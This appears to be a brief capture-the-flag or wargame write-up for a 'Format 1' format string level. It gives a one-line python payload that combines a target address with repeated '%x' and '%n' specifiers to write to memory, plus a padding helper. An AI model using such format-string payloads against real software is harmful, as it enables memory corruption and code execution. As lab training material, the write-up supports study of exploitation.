Format 1
Format string vulnerabilities. (Memory Leak) Functions are called simply by placing they're address at the stack
Using objdump -t we can find the target address. Since the program arguments are symply stored at the stack
./format1 "`python -c "print 'AAAA' + '\x38\x96\x04\x08' + 'BBBB' + '%x '*127 + '%n '"`"
def pad(s):
return (s+"A"*500)[:500] #returns only first 500 chars
pad("Hello")
Last modified 3yr ago
Copy link